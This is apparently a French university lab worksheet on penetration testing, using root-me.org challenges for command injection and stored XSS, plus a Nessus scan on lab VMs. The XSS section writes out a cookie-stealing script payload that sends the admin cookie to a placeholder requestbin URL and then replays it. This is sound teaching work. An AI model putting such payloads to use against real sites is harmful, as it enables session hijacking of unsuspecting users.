# TD.D3 Introduction au test d'intrusion

## But du TD

Le but de ce TD est de comprendre le déroulement d'un test d'intrusion.

Rappel éthique, méthodologique et législatif
## Challenges root-me.org
Cette première partie utilise le site root-me.org qui propose des challenges en ligne.

## Injection de commande
Site : https://www.root-me.org/fr/Challenges/Web-Serveur/Injection-de-commande
- Comprendre quelle est l'utilité de la page, son fonctionnement.
- Détourner la valeur entrée dans le formulaire pour faire exécuter du code côté serveur et afficher le contenu du fichier index.php
- Explorer le code source de la page grâce à des outils type firefox ou Burp pour récupérer les informations.
Pour aller plus loin : ne pas se contenter du mot de passe (flag) mais comprendre quel est l'utilisateur connecté, quels sont les droits de celui-ci, les fichiers auxquels il a accès...

### XSS - stockée
Cet exercice ne fonctionne pas avec Chrome.
Site : https://www.root-me.org/fr/Challenges/Web-Client/XSS-Stockee-2
- Utiliser Burp (à configurer) pour intercepter les requêtes HTTP.
- Injecter la XSS d'abord dans le formulaire pour s'assurer que le site est vulnérable aux XSS.
- Utiliser un requestbin pour simuler un serveur web.
- Injecter la XSS dans le cookie : `status=invite"><script>document.location='URL_REQUESTBIN_A_MODIFIER/'%2Bdocument.cookie</script>` pour envoyer le cookie admin vers votre serveur requestbin
- Utiliser requestbin pour récupérer le cookie admin de la XSS (cela peut prendre plusieurs minutes).
- Créer une nouvelle requête vers root-me en injectant le cookie récupéré juste avant pour avoir accès au mot de passe (flag) [Cookie: status=admin ADMIN_COOKIE=XXXXXX] OU réinjecter le cookie dans le navigateur utilisé.

### Nessus
- Expliquer la portée de l'outil, ses limitations et les précautions à prendre pour son utilisation.
- Sur la machine debian fournie (root/toor) et importée grâce à l'OVA "VM_NESSUS", lancer https://127.0.0.1:8834 pour lancer Nessus en local.
- Se connecter avec admin/admin.
- Lancer un scan "new scan - advanced scan" sur l'IP de la machine cible.
- Attendre 7/8 minutes puis parcourir le rapport .

## Remarques

- S'assurer que votre VM_NESSUS et votre VM_VULNERABLE ont toutes les deux des interfaces réseaux montées et actives (@IP sur chaque).
- Ne jamais monter une VM vulnérable en NAT.
